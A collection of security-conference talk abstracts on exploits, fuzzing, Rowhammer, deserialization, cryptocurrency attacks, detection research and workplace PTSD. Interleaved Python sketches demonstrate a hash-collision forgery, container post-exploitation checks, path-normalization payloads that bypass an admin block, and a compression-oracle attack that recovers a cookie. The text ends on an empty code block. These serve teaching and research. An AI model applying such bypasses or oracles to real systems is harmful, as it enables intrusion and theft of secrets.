Working in security is a principled decision. Many of us do this because we want to help make technology more reliable and safer for our friends, our family - for humanity. Your skills got you a job, but your principles and drive got you the skills.
Turning your ideals into real, concrete outcomes at scale is… daunting. Interconnected networks, billions of lines of ever-evolving code, third party dependencies and legacy requirements, competing priorities, conflicting incentives, snake oil solutions; these are just a few of the challenges that are familiar to security professionals, and that doesn't even include the social and communication barriers or endless philosophical debates.
So, how do you actually make technology in complex landscapes safer, at scale?
This talk offers guiding advice that we as security practitioners and leaders must embrace in order to succeed. Drawing on her experiences leading some of the biggest, ongoing security efforts that aim to make technology safer for all users, Parisa will first share how throwing out the rule book on vulnerability disclosure has been moving giants of the software industry toward measurably faster patching and end-user security. Next, she will share how a grassroots side project grew to shift the majority of the web ecosystem to secure transport, nearly 25 years after the technology was first made available. Finally, she will review the major effort to implement an intern's publication in one of today's largest open source projects, and how they persevered for 5+ years of refactoring, avoiding efforts to defund the work along the way. (Coincidentally, this project helped the world's most popular browser mitigate a new class of hardware vulnerabilities earlier this year!)
In December last year, I released the async_wake exploit for iOS 11.1.2. In this talk, I'll cover how each step of the exploit worked and discuss in depth each mitigation which was defeated along the way.
I'll focus on what was supposed to make exploitation hard, what techniques other public exploits would have used in earlier iOS versions, and what mitigations we might see in iOS 12 and beyond (and how to break those too!).
On macOS, DEP (Device Enrollment Program) and MDM (Mobile Device Management) are the recommended methods for automating the initial setup & configuration of new devices. MDM can offer sophisticated system configuration options, including privileged operations such as adding new trusted root CA certificates to the System Keychain. Apple's MDM implementation has gained popularity in the enterprise world recently due to its rich feature set.
The recent introduction of User Approved MDM and the continued enhancements to security technologies such as SIP, Gatekeeper, and others are evidence of Apple's ongoing commitment to MDM. Some operations, such as whitelisting of allowed kernel extensions, are now only supported if the device is enrolled in a trusted MDM. Under the hood, the DEP & MDM implementation involves many moving parts. Within macOS, several daemons are involved in the process of bootstrapping the trust necessary to bring a new device up to a fully provisioned state. If an attacker can identify vulnerabilities within the bootstrapping process and effectively exploit them, they may be able to make use of this trusted process to compromise a device as it first boots.
Our talk walks through the various stages of bootstrapping, shows which binaries are involved and what the IPC flows on the device look like, and evaluates the network (TLS) security of key client/server communications. We will follow with a live demo showing how a nation-state actor could exploit this vulnerability such that a user could unwrap a brand new Mac, and the attacker could root it out of the box the first time it connects to WiFi.
Virtualization technology is an increasingly common foundation on which platform security is built and clouds are secured. However, virtualization stacks are ultimately software, all software has vulnerabilities, and few things are more beautiful (or scary) than a guest-to-host exploit.
Research into this cutting-edge area is not only interesting, it is extremely profitable. Microsoft offers a bug bounty program with rewards up to $250,000 USD for vulnerabilities in Hyper-V. To make your bounty hunting efforts easier, we will outline how Hyper-V works with a focus on the information you, as a security researcher, need to find vulnerabilities. This will cover relevant details about the Hyper-V hypervisor and supporting kernel-mode and user-mode components. We'll also show off some of the interesting vulnerabilities we've seen in Hyper-V and discuss what they would have fetched if they had been reported through the bounty.
Our talk presents attacks on the cryptography used in the cryptocurrency IOTA, which is currently the 10th largest cryptocurrency with a market capitalization of 2.8 billion USD. IOTA is billed as a next generation blockchain for the Internet of Things (IoT) and claims partnerships with major companies in the IoT space such as Volkswagen and Bosch.
We developed practical differential cryptanalysis attacks on IOTA's cryptographic hash function Curl-P, allowing us to quickly generate short colliding messages of the same length. Exploiting these weaknesses in Curl-P, we break the EU-CMA security of the IOTA signature scheme. Finally, we show that in a chosen message setting we can forge signatures on valid IOTA payments. We present and demonstrate a practical attack (achievable in a few minutes) whereby an attacker could forge a signature on an IOTA payment, and potentially use this forged signature to steal funds from another IOTA user.
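To make the consequence of a hash collision concrete, here is a minimal, hedged sketch (not Curl-P and not IOTA's actual signature scheme): when a signature scheme signs a weak message digest, any pair of colliding messages yields a forgery, because a signature issued for one message verifies for the other. The truncated digest, the payment strings, and the use of Ed25519 below are all illustrative assumptions.

```python
# Toy illustration: a signature over a weak (deliberately truncated) digest is
# forgeable as soon as a digest collision is found. Not IOTA's real scheme.
import hashlib
from itertools import count
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

def weak_digest(msg: bytes) -> bytes:
    # Truncated to 3 bytes so a birthday collision is cheap to find (~2^12 tries).
    return hashlib.sha256(msg).digest()[:3]

def find_collision():
    seen = {}
    for i in count():
        msg = b"pay 1 token to address %d" % i
        d = weak_digest(msg)
        if d in seen:
            return seen[d], msg
        seen[d] = msg

sk = Ed25519PrivateKey.generate()
pk = sk.public_key()

m1, m2 = find_collision()
sig = sk.sign(weak_digest(m1))     # victim signs m1 (via its digest)
pk.verify(sig, weak_digest(m2))    # ...and the same signature verifies for m2
print("signature on", m1, "also accepted for", m2)
```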
After we disclosed our attacks to the IOTA project, they patched the vulnerabilities presented in our research. However, Curl-P is still used in other parts of IOTA.
AFL has claimed many successes in fuzzing a wide range of applications. In the past few years, researchers have continuously generated new improvements to enhance AFL's ability to find bugs. However, far less attention has been given to how to hide bugs from AFL.
This talk is about AFL's blind spot: a limitation of AFL, and how to use that limitation to prevent AFL from finding specific bugs. AFL tracks code coverage through instrumentation and uses the coverage information to guide input mutations. Instead of fully recording complete execution paths, AFL uses a compact hash bitmap to store code coverage. This compact bitmap brings high execution speed but also a constraint: a new path can be masked by previous paths in the compact bitmap due to hash collisions. The inaccuracy and incompleteness of the coverage information sometimes prevent an AFL fuzzer from discovering potential paths that lead to new crashes.
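A small model may help illustrate the masking effect. The sketch below imitates AFL-style edge coverage (hashing a previous/current block pair into a fixed-size bitmap) and counts how many distinct edges land in an already-occupied slot; the block IDs are random stand-ins, not real program data, and the hashing formula is only an approximation of AFL's instrumentation.

```python
# Minimal model of AFL-style edge coverage: each (prev_block, cur_block) edge is
# folded into a fixed-size bitmap, so distinct edges that collide in the bitmap
# are indistinguishable and an input exercising a new edge may be discarded.
import random

MAP_SIZE = 1 << 16                      # AFL's default bitmap is 64 KiB

def edge_index(prev_loc: int, cur_loc: int) -> int:
    # Approximation of AFL's cur_location ^ (prev_location >> 1) scheme.
    return (cur_loc ^ (prev_loc >> 1)) % MAP_SIZE

random.seed(7)
blocks = [random.getrandbits(16) for _ in range(5000)]   # pretend basic-block IDs

seen, masked = set(), 0
for prev, cur in zip(blocks, blocks[1:]):
    idx = edge_index(prev, cur)
    if idx in seen:
        masked += 1                     # a new edge the bitmap cannot tell apart
    seen.add(idx)

print(f"{masked} of {len(blocks) - 1} edges collided with an earlier bitmap slot")
```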
This presentation demonstrates these limitations with examples showing how the blind spot limits AFL's ability to find bugs, and how it prevents AFL from taking seeds generated by complementary approaches such as symbolic execution.
To further illustrate this limitation, we build a software prototype called DeafL, which transforms and rewrites ELF binaries for the purpose of resisting AFL fuzzing. Without changing the functionality of a given ELF binary, the DeafL tool rewrites the input binary into a new ELF executable, so that a bug AFL finds easily in the original binary becomes difficult to find in the rewritten binary.
Every single security company is talking in some way or another about how they are applying machine learning. Companies go out of their way to make sure they mention machine learning and not statistics when they explain how they work. Recently, that's not enough anymore either. As a security company you have to claim artificial intelligence to be even part of the conversation.
Guess what. It's all baloney. We have entered a state in cyber security that is, in fact, dangerous. We are blindly relying on algorithms to do the right thing. We are letting deep learning algorithms detect anomalies in our data without having a clue what those algorithms just did. In academia, they call this the lack of explainability and verifiability. But rather than building systems with actual security knowledge, companies are using algorithms that nobody understands and, in turn, producing wrong insights.
In this talk, I will show the limitations of machine learning, outline the issues of explainability, and show where deep learning should never be applied. I will show examples of how the blind application of algorithms (including deep learning) actually leads to wrong results. Algorithms are dangerous. We need to return to experts and invest in systems that learn from, and absorb the knowledge of, experts.
Containerization, such as that provided by Docker, is becoming very popular among developers of large-scale applications. This is likely to make life a lot easier for attackers.
While exploitation and manipulation of traditional monolithic applications might require specialized experience and training in the target languages and execution environment, applications made up of services distributed among multiple containers can be effectively explored and exploited "from within" using many of the system- and network-level techniques that attackers, such as penetration testers, already know.
The goal of this talk is to provide a penetration tester experienced in exploitation and post-exploitation of networks and systems with an exposure to containerization and the implications it has on offensive operations. Docker is used as a concrete example for the case study. A penetration tester can expect to leave this presentation with a practical exposure to multi-container application post-exploitation that is as buzzword-free as is possible with such a trendy topic.
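As a flavor of the "from within" reconnaissance the talk covers, here is a hedged sketch of the sort of container-awareness checks a tester might script after landing a shell. The paths are standard Docker artifacts; the list of "interesting" items is purely illustrative and not tied to any particular target.

```python
# Quick container-awareness checks of the kind a tester might run post-exploitation:
# standard Docker artifacts only, nothing target-specific.
import os

def in_container() -> bool:
    if os.path.exists("/.dockerenv"):
        return True
    try:
        with open("/proc/1/cgroup") as fh:
            return any(("docker" in line or "kubepods" in line) for line in fh)
    except OSError:
        return False

def interesting_artifacts():
    candidates = [
        "/var/run/docker.sock",   # mounted Docker socket often means host takeover
        "/proc/net/tcp",          # reachable services inside the container network
        "/run/secrets",           # Docker/Swarm secrets, if mounted
    ]
    return [p for p in candidates if os.path.exists(p)]

if __name__ == "__main__":
    print("inside a container:", in_container())
    print("artifacts worth a look:", interesting_artifacts())
```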
The Rowhammer bug is an issue in most DRAM modules that allows software to cause bit flips in DRAM cells, consequently manipulating data. Although only considered a reliability issue by DRAM vendors, research has shown that a single bit flip can subvert the security of an entire computer system.
In the introduction of the talk, we will outline the developments around Rowhammer since its presentation at Black Hat USA 2015.
We discuss attacks and defenses that researchers came up with. The defenses against Rowhammer either try to prevent the Rowhammer effect entirely, or at least ensure that Rowhammer attacks cannot exploit the bug anymore.
We will present a novel Rowhammer attack that undermines all existing assumptions on the requirements for such attacks.
With one-location hammering, we show that Rowhammer does not necessarily require alternating accesses to two or more addresses.
We explain that modern CPUs rely on memory-controller policies that enable an attacker to use this new hammering technique.
Moreover, we introduce new building blocks for exploiting Rowhammer-like bit flips which circumvent all currently proposed countermeasures. In addition to classical privilege escalation attacks, we also demonstrate a new, easily mountable denial-of-service attack which can be exploited in the cloud.
We will also show that despite all efforts, the Rowhammer bug is still not prevented. We conclude that more research is required to fully understand this bug to subsequently be able to design efficient and secure countermeasures.
In the not too distant future, we'll live in a world where computers are driving our cars. Soon, cars may not even have steering wheels or brake pedals. But, in this scenario, should we be worried about cyber attacks on these vehicles? In this talk, two researchers who have headed self-driving car security teams for multiple companies will discuss how self-driving cars work, how they might be attacked, and how they can ultimately be secured.
With the advent of electronic trading platforms and networks, the exchange of financial securities is now easier and faster than ever; but this comes with inherent risks. Nowadays, it is not only the rich who can invest in the money markets: anyone with as little as $10 can start trading stocks from a mobile phone, a desktop application, or a website.
The problem is that this area of the fintech industry has not been fully under the cybersecurity umbrella. Sometimes we assume that a product is secure by its nature, such as technologies that are used to trade hundreds of billions per day, but security testing tells us a different story.
In this talk, vulnerabilities that affect millions of traders will be shown in detail. Among them are unencrypted authentication, communications, passwords, and trading data; remote DoS that leaves applications useless; weak password policies; hardcoded secrets; poor session management; etc. Also, many of these applications lack countermeasures such as SSL certificate validation and root detection in mobile apps, a privacy mode to mask sensitive values, and anti-exploitation and anti-reversing mitigations.
Moreover, the risks of social trading will be discussed, as well as how malicious expert advisors (trading robots) and other plugins could include backdoors or hostile code that would be hard to spot for non-tech-savvy traders.
The analysis encompassed the following platforms, which are among the most widely used:
- 16 Desktop applications
- 29 Websites (7 focused on cryptocurrencies)
- 34 Mobile apps
Finally, the gap between the security of online banking and that of trading technologies will be clearly visible. There's still a long way to go to improve the security of the trading ecosystem, but the wheel has already been invented and common security countermeasures could be applied.
The Android Runtime (ART), although introduced back in Android 5, has not received much attention in the security community. However, its on-device compiler dex2oat, which mostly deprecated the Dalvik VM, leaves a gap by rendering well-known tools such as TaintDroid and its descendants inapplicable. But it also provides new opportunities for security researchers.
On top of dex2oat, we created ARTist, the Android instrumentation and security toolkit, a novel instrumentation framework that allows for arbitrary code modification of installed apps, the system server, and the Java framework code. Similar to existing approaches, such as Frida and Xposed, ARTist can be used for app analysis and reversing (recording traffic, modifying files and databases), as well as modding and customization. However, it occupies a sweet spot in the design space of instrumentation tools: it does not break the app signature (so modified applications still receive updates without compromising security), it can be deployed on rooted stock devices beginning with Android 6, and it allows for instrumentation at the instruction level.
We provide developers with a module SDK to get started with writing their own instrumentation routines right away. Since no complicated system of hooks or additional runtime is required, it is highly efficient and neatly integrates with the compiler's optimization framework. We created a range of interesting modules that showcase different use cases, from the large-scale instrumentation of every single method in the system server (25k methods) to simple, on-point injections in third-party apps and even full compartmentalization of advertisement libraries. Our tool is open sourced at https://github.com/Project-ARTist and https://artist.cispa.saarland. ARTist is still in its early stages, so we hope to collect a lot of feedback and create an active community.
Although vulnerabilities stemming from the deserialization of untrusted data have been understood for many years, unsafe deserialization continues to be a vulnerability class that isn't going away. Attention on Java deserialization vulnerabilities skyrocketed in 2015 when Frohoff and Lawrence published an RCE gadget chain in the Apache Commons library, and as recently as last year's Black Hat, Muñoz and Mirosh presented a survey of dangerous JSON deserialization libraries. While much research and automated detection technology has so far focused on the discovery of vulnerable entry points (i.e. code that deserializes untrusted data), finding a "gadget chain" to actually make the vulnerability exploitable has thus far been a largely manual exercise. In this talk, I present a new technique for the automated discovery of deserialization gadget chains in Java, allowing defensive teams to quickly identify the significance of a deserialization vulnerability and allowing penetration testers to quickly develop working exploits. At the conclusion, I will also be releasing a FOSS toolkit which utilizes this methodology and has been used to successfully develop many deserialization exploits in both internal applications and open source projects.
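One way to picture the core idea, without claiming this is the released toolkit's actual algorithm, is to treat gadget-chain discovery as graph search: nodes are methods, edges mean "may be invoked during deserialization", sources are the magic methods a deserializer calls automatically, and sinks are dangerous calls. The tiny call graph below is a hand-written toy loosely modeled on a well-known Commons Collections chain, not output from real bytecode analysis.

```python
# Toy sketch of gadget-chain discovery as breadth-first search over a call graph.
# The graph and method names below are illustrative, not extracted from bytecode.
from collections import deque

CALL_GRAPH = {
    "HashMap.readObject":           ["AbstractMap.hash"],
    "AbstractMap.hash":             ["TiedMapEntry.hashCode"],
    "TiedMapEntry.hashCode":        ["LazyMap.get"],
    "LazyMap.get":                  ["ChainedTransformer.transform"],
    "ChainedTransformer.transform": ["InvokerTransformer.transform"],
    "InvokerTransformer.transform": ["Runtime.exec"],
}
SOURCES = ["HashMap.readObject"]            # invoked automatically on deserialization
SINKS   = {"Runtime.exec", "ProcessBuilder.start"}

def find_chain(sources, sinks, graph):
    queue = deque((s, [s]) for s in sources)
    seen = set(sources)
    while queue:
        node, path = queue.popleft()
        if node in sinks:
            return path
        for callee in graph.get(node, []):
            if callee not in seen:
                seen.add(callee)
                queue.append((callee, path + [callee]))
    return None

print(" -> ".join(find_chain(SOURCES, SINKS, CALL_GRAPH)))
```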
The Namecoin and Emercoin blockchains were designed to provide decentralized and takedown-resistant domain names to users with the reported goal of promoting free speech. By leveraging unofficial Top-Level Domains (TLDs) such as .bit and alternate DNS resolution methods such as the OpenNIC project, users can register and configure their own domains on these blockchains at a relatively cheap price.
In recent years, cybercriminals have adopted and abused this infrastructure and implemented it into well-known malware such as Dimnie, Smoke Loader, and Necurs, as well as larger, more targeted workflows. The resiliency of blockchain technology prevents researchers and ISPs from taking down or sinkholing these domains. In addition, limited public knowledge of this threat in a larger context and the constraints of alternative DNS resolution limit an analyst's ability to map out related domains and IP addresses when malicious activity is identified.
On the other hand, blockchain-based infrastructure comes with a serious drawback: data added to or removed from these blockchains becomes a permanent record of a threat actor's activity. This talk is intended to leverage this attribute to tackle these issues, providing high and medium-confidence methodologies for mapping out these blockchains through TTP analysis, script-based transaction mapping, and index-based infrastructure correlation. In doing so, analysts will be able to generate additional intelligence surrounding a threat and proactively identify likely malicious domains as they are registered or become active on the blockchain.
It's January 2nd, 2018. Your phone buzzes. You've been working for more than 6 months to fight a new class of hardware vulnerabilities with a number of other companies. You *had* seven days until planned disclosure, but the incoming text tells you that there has been a leak and disclosure is now less than 24 hours away. You aren't ready…what do you do?
Months before the public learned about the challenges with speculative execution, defenders from hardware, platform, cloud, and service providers were working together around the clock building mitigations and coordinating a response to help protect the billions of users depending on their platforms. This is the behind the scenes story of what those months were like, from the perspective of Apple, Google, and Microsoft. Along the way, competitors became partners and an unprecedented level of information was shared.
Much has been written about how to do multi-party coordinated response, but it's time to throw out what you know – we need a new playbook. In this panel, you'll learn about details of the response that have never been shared with the public, and you'll come away with lessons about what worked and what didn't in the most complicated multi-party vulnerability in memory.
The tech industry is increasingly interdependent and Spectre and Meltdown are a wake-up call on multiple dimensions – how we engineer, how we partner, and how we react when we find new security issues. This panel won't give you all the answers, but it is a start.
The number of logic attacks on ATMs continues to rise. Some of them involve a "black box," a device that is physically connected to the cash dispenser and sends commands to push out cash. Within five years of the first known black box attacks (starting from 2012), almost all new ATMs started encrypting commands to the dispenser as a precautionary measure. The research community attempted to investigate the security of the implemented encryption and even obtained positive results (such results were described by Positive Technologies researchers). Criminals concentrated their efforts on easier targets, since unprotected ATMs remained plentiful. However, this situation changed rapidly in the fall of 2017, when criminals began to employ attacks on the "secure" dispenser interface. The current state of security is discouraging: we analyzed four commercially available dispensers from major vendors and successfully withdrew cash from all of them. So despite all the efforts, ATM security is still little better than in 2012.
In the blockchain, contracts may be lost but are never forgotten. Over 1,500,000 Ethereum smart contracts have been created on the blockchain but under 7,000 unique contracts have value today. An even smaller fraction of those have source code to analyze. Old contracts have been purged from the world computer's working memory but they can be reconstructed and analyzed. When a contract's purpose is fulfilled, the owner typically triggers a self-destruct switch that removes code and state. These steps are similar to what an attacker would do after hijacking a contract. Is it likely the self-destruct was intentional or performed by a trusted third party? Or was it a hack or fraud? By investigating the transactions leading up to the termination of a binary-only contract, we can determine if there was an attack. After identifying an attacker, we can find patterns that lead to a possible motive by carefully examining their other transactions.
This presentation will introduce Ethereum smart contracts, explain how to reverse engineer binary-only contracts, describe common classes of vulnerabilities, and then show how to investigate attacks on contracts by demonstrating new tools that re-process blockchain ledger data, recreate contracts with state, and analyze suspect transactions using traces and heuristics.
We propose a new exploit technique that opens a whole new attack surface by defeating path normalization, which is complicated to implement due to many implicit properties and edge cases. This complication, underestimated or ignored by developers for a long time, has made our proposed attack vector possible, lethal, and general. Therefore, many 0days have been discovered via this approach in popular web frameworks written in trending programming languages, including Python, Ruby, Java, and JavaScript.
Being a very fundamental problem that exists in path normalization logic, sophisticated web frameworks can also suffer. For example, we've found various 0days on Java Spring Framework, Ruby on Rails, Next.js, and Python aiohttp, just to name a few. This general technique can also adapt to multi-layered web architecture, such as using Nginx or Apache as a proxy for Tomcat. In that case, reverse proxy protections can be bypassed. To make things worse, we're able to chain path normalization bugs to bypass authentication and achieve RCE in real world Bug Bounty Programs. Several scenarios will be demonstrated to illustrate how path normalization can be exploited to achieve sensitive information disclosure, SMB-Relay and RCE.
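To give a feel for the class of bug (without reproducing any specific framework's code), here is a hedged toy: a front-end proxy authorizes the raw path while the back-end decodes, strips servlet-style ";" parameters, and normalizes before routing, so the two components disagree about what is being requested. The payloads and rules are illustrative only.

```python
# Toy normalization mismatch: the edge checks the raw path, the back-end decodes,
# strips ";" segment parameters, and normalizes. Payloads and rules are invented.
import posixpath
from urllib.parse import unquote

def proxy_allows(raw_path: str) -> bool:
    # Naive edge rule: block anything under /admin.
    return not raw_path.startswith("/admin")

def backend_route(raw_path: str) -> str:
    decoded = unquote(raw_path)
    stripped = "/".join(seg.split(";", 1)[0] for seg in decoded.split("/"))
    return posixpath.normpath(stripped)

for payload in ["/admin/console",
                "/public/..;/admin/console",
                "/public/%2e%2e/admin/console"]:
    print(f"{payload:34} proxy allows={proxy_allows(payload)!s:5} "
          f"backend serves={backend_route(payload)}")
```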
Understanding the basics of this technique, the audience won't be surprised to learn that more than 10 vulnerabilities have been found via this technique in the aforementioned sophisticated frameworks and multi-layered web architectures.
Industrial control gateways connect most of the critical infrastructure surrounding us to centralized management systems: from power grids (transformer stations, solar fields) and city infrastructure (traffic lights, tunnel control systems) to big industrial plants (automotive, chemical), these devices can be found almost everywhere. In recent years, these gateways have even been used in attacks on countries such as Ukraine in 2015 and Saudi Arabia in 2018. This presentation reviews the security of those gateways, going from attacking the communication protocols up to reverse engineering and fuzzing proprietary firmware and protocols, and concludes with a live demonstration of the vulnerabilities on real devices, showing that the industrial control gateways of most vendors have significant security shortcomings and are not secure enough to be used in critical infrastructure.
The software-defined wide-area network (SD-WAN) applies the SDN approach to branch office connections in enterprises. According to Gartner's predictions, more than 50% of routers will be replaced with SD-WAN solutions by 2020.
SD-WAN products can have firewalls and other perimeter security features on board, which makes them attractive targets for attackers. Vendors promise "on-the-fly agility, security" and many other benefits. But what does "security" really mean from a hands-on perspective? Most SD-WAN solutions are distributed as Linux-based virtual appliances or cloud-centric services, which can make them low-hanging fruit even for a script kiddie.
This presentation will introduce a practical analysis of different SD-WAN solutions from the attacker's perspective. The attack surface, threat model, and real-world vulnerabilities of SD-WAN solutions will be presented.
Social engineering is a big problem but very little progress has been made in stopping it, aside from the detection of email phishing. Social engineering attacks are launched via many vectors in addition to email, including phone, in-person, and via messaging. Detecting these non-email attacks requires a content-based approach that analyzes the meaning of the attack message.
We observe that any social engineering attack must either ask a question whose answer is private, or command the victim to perform a forbidden action. Our approach uses natural language processing (NLP) techniques to detect questions and commands in the messages and determine whether or not they are malicious.
Question answering approaches, a hot topic in information extraction, attempt to provide answers to factoid questions. Although the current state-of-the-art in question answering is imperfect, we have found that even approximate answers are sufficient to determine the privacy of an answer. Commands are evaluated by summarizing their meaning as a combination of the main verb and its direct object in the sentence. The verb-object pairs are compared against a blacklist to see if they are malicious.
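As a rough illustration of the verb/direct-object idea (not the system described in the talk), the sketch below uses an off-the-shelf dependency parser to pull (verb, object) pairs from a message and check them against a blacklist. The blacklist contents are made up, and the spaCy model en_core_web_sm is assumed to be installed.

```python
# Sketch of command screening via verb/direct-object pairs using spaCy.
# The blacklist is an illustrative assumption, not the talk's actual rule set.
import spacy

nlp = spacy.load("en_core_web_sm")
BLACKLIST = {("send", "password"), ("wire", "money"),
             ("disable", "antivirus"), ("open", "attachment")}

def malicious_commands(text: str):
    hits = []
    for tok in nlp(text):
        if tok.dep_ == "dobj" and tok.head.pos_ == "VERB":
            pair = (tok.head.lemma_.lower(), tok.lemma_.lower())
            if pair in BLACKLIST:
                hits.append(pair)
    return hits

print(malicious_commands("Please wire the money today and send your password."))
```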
We have tested this approach with over 187,000 phishing and non-phishing emails. We discuss the false positives and false negatives and why this is not an issue in a system deployed for detecting non-email attacks. In the talk, demos will be shown and tools will be released so that attendees can explore our approach for themselves.
Security researchers have carried out a good number of practical chosen-plaintext attacks on compressed traffic in the past to steal sensitive data. In spite of how popular CRIME and BREACH were, little has been said about how this class of attacks applies to VPN networks. Compression oracle attacks are not limited to TLS-protected data. Regardless of the underlying encryption framework being used, these VPN networks offer a widely used feature usually known as TCP compression, which acts much like the TLS compression feature of the pre-CRIME era.
In this talk, we try these attacks on browser requests and responses whose HTTP traffic is usually tunneled through VPNs. We also explore the possibility of attacking ESP compression and other such optimizations in any tunneled traffic that is encrypted. We also show a case study with a well-known VPN server and its plethora of clients.
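The underlying oracle is easy to demonstrate in miniature. The hedged sketch below (plain zlib, no VPN or TLS specifics, invented cookie value) shows that when attacker-controlled bytes repeat a secret elsewhere in the same compressed stream, the output shrinks, so the secret can be guessed byte by byte.

```python
# The compression-oracle primitive in isolation: a correct guess extends an LZ77
# match against the secret, so the compressed stream gets shorter.
import zlib

SECRET = "sessionid=7f3c9a"          # unknown to the attacker
CHARSET = "0123456789abcdef"

def compressed_len(guess: str) -> int:
    # Attacker-controlled reflection and the secret share one compressed stream.
    stream = f"GET /?q={guess} HTTP/1.1\r\nCookie: {SECRET}\r\n".encode()
    return len(zlib.compress(stream, 9))

known = "sessionid="
while len(known) < len(SECRET):
    # Real attacks add padding or the "two tries" trick to break length ties.
    known += min(CHARSET, key=lambda c: compressed_len(known + c))
print("recovered:", known)
```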
We then go into practical defenses and how mitigations in HTTP/2's HPACK and other mitigation techniques are the way forward rather than claiming 'Thou shall not compress traffic at all.' One of the things that we would like to showcase is how impedance mismatches in these different layers of technologies affect security and how they don't play well together.
This talk sheds some light on the intermediate language used inside the Hex-Rays Decompiler. The microcode is simple yet powerful enough to represent real-world programs. With the microcode details publicly available, it is now possible to build more intelligent binary analysis tools on top of the decompiler.
Industrial control systems (ICS) security has become a serious concern over the past years. Indeed, the threat to ICS has become a reality, and real-world attacks have been observed. Many systems driving critical functions cannot be stopped to receive security upgrades, so protecting these very sensitive assets is a tough challenge.
As the ICS security market grows fast, dedicated firewalls have appeared to address this problem by inspecting and filtering industrial control protocols. But what are those solutions worth? Are they really different from standard network firewalls? What exactly are their attack surfaces, and what kind of bugs may we find there?
We propose to answer those questions in the case of the Tofino Xenon. We will present the methodology we used to reverse engineer equipment that uses a custom, encrypted administration protocol and has fully encrypted firmware, from reverse engineering a rich client to obtaining a root shell on the appliance. Then we will cover the firewall internals, the attack surface it offers, and the security features it provides to vulnerable ICS equipment. Finally, we will present the vulnerabilities we found (CVE-2017-11400, CVE-2017-11401, and CVE-2017-11402), their impact, and the attack scenarios to exploit them.
Anyone who keeps up with technology news has read about deep neural networks beating human champions at Go, achieving breakthrough accuracy at voice recognition, and generally driving today's major advances in artificial intelligence. Little has been said, however, about the ways deep neural network approaches are quietly achieving analogous breakthroughs in intrusion detection. My goal with this presentation is to change this, by demystifying deep neural network (deep learning) concepts, presenting research that shows that we can use deep learning methods to achieve breakthrough cyber-attack detection, and by introducing open source deep learning tools, so that attendees can leave equipped to start their own security deep neural network research.
The presentation will start with an intuitive overview of deep neural networks, introducing the ideas that allow neural networks to learn from data and make accurate decisions about whether, for example, files are good or bad, or a given URL or domain name is malicious. After introducing deep neural networks, I'll go on to describe a case study: a deep neural network that uses a convolutional neural network approach to detect malicious URLs at higher accuracy than any previously reported technique, which we have evaluated on live, real-world data. Finally, I'll introduce the open source tools available for doing security deep learning research, giving attendees a starting place for incorporating deep neural networks into their own security practice.
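For readers who want a concrete starting point, here is a hedged, minimal sketch of a character-level convolutional URL classifier; the layer sizes, vocabulary, and tiny inline examples are illustrative assumptions and not the architecture or dataset evaluated in the talk. It assumes TensorFlow/Keras is installed.

```python
# Minimal character-level CNN for URL classification (illustrative sizes only).
import numpy as np
from tensorflow.keras import layers, models

MAX_LEN, VOCAB = 200, 128            # pad/truncate URLs to 200 chars, ASCII vocab

def encode(url: str) -> np.ndarray:
    ids = [min(ord(c), VOCAB - 1) for c in url[:MAX_LEN]]
    return np.array(ids + [0] * (MAX_LEN - len(ids)))

model = models.Sequential([
    layers.Embedding(input_dim=VOCAB, output_dim=32),
    layers.Conv1D(filters=128, kernel_size=5, activation="relu"),
    layers.GlobalMaxPooling1D(),
    layers.Dense(64, activation="relu"),
    layers.Dense(1, activation="sigmoid"),       # P(malicious)
])
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])

# Toy usage: real work needs a large labeled corpus of benign/malicious URLs.
X = np.stack([encode("http://example.com/login"),
              encode("http://evil.example/%41%41?x=cmd")])
y = np.array([0, 1])
model.fit(X, y, epochs=1, verbose=0)
print(model.predict(X, verbose=0).ravel())
```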
In this talk, we describe DeepLocker, a novel class of highly targeted and evasive attacks powered by artificial intelligence (AI). As cybercriminals increasingly weaponize AI, cyber defenders must understand the mechanisms and implications of the malicious use of AI in order to stay ahead of these threats and deploy appropriate defenses.
DeepLocker was developed as a proof of concept by IBM Research in order to understand how several AI and malware techniques already seen in the wild could be combined to create a highly evasive new breed of malware, one which conceals its malicious intent until it reaches a specific victim. It achieves this by using a deep neural network (DNN) AI model to hide its attack payload in benign carrier applications; the payload is unlocked if, and only if, the intended target is reached. DeepLocker leverages several attributes for target identification, including visual, audio, geolocation, and system-level features. In contrast to existing evasive and targeted malware, this method would make it extremely challenging to reverse engineer the benign carrier software and recover the mission-critical secrets, including the attack payload and the specifics of the target.
We will perform a live demonstration of a proof-of-concept implementation of a DeepLocker malware, in which we camouflage well-known ransomware in a benign application such that it remains undetected by malware analysis tools, including anti-virus engines and malware sandboxes. We will discuss technical details, implications, and use cases of DeepLocker. More importantly, we will share countermeasures that could help defend against this type of attack in the wild.
In February 2018, an article appeared concerning 'cybersecurity PTSD' and its impact on the security workforce, spurring a reaction to the terminology and the conditions referenced. More anecdotally, we as security practitioners have all heard co-workers lament of a stressful experience resulting in some sort of workplace 'PTSD.' While it is therapeutic to joke about serious issues at times, as a Post-Traumatic Stress Disorder sufferer and survivor there are limits – but also scope to identify moments for our industry to grow in facing such issues.
Whether through sexual trauma, military service, or other traumatic experiences, the number of diagnosed cases of PTSD is increasing – and along with it the chances that you will encounter someone living with this condition in the workplace. As the security industry grows and matures, the proper response is not to ignore, avoid, or shun this topic, but to embrace PTSD and coworkers and colleagues experiencing it to better understand the condition and formulate a better, more understanding workplace.
In this talk, I will speak to my own story of PTSD – from military service in Afghanistan to a unique medical trauma – and how it has shaped not just my life, but my work in cybersecurity. Principally, cybersecurity has offered a haven for me, cognitively and emotionally, and I feel that I am not alone in finding peace and solace in our field. In providing this overview, I will touch on various points that we as a community can embrace to better understand and support those in our midst who may also suffer from such a condition.
Overall, the goal is to keep matters reasonably 'light' so we as a community can discuss such subjects, while at the same time diving head on into how the security culture both supports and provides difficulties to PTSD survivors. Ultimately, developing a more empathetic, emotionally aware security community will only benefit us as a profession – and PTSD is an excellent starting point for such a conversation.
Credential compromise in the cloud is not a threat that one company faces, rather it is a widespread concern as more and more companies operate in the cloud. Credential compromise can lead to many different outcomes depending on the motive of the attacker who compromised the credentials. In some cases in the past, it has led to erroneous AWS service usage for bitcoin mining or other non-destructive yet costly abuse, and in others it has led to companies shutting down due to the loss of data and infrastructure.
This paper describes an approach for detection of compromised credentials in AWS without needing to know all IPs in your infrastructure beforehand.
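As a hypothetical illustration of this class of approach (not the speaker's actual method), one simple heuristic is to learn, per access key, the set of source IPs observed in CloudTrail and alert the first time a key is used from a location never before associated with it. The field names below are standard CloudTrail record fields; the file names are placeholders.

```python
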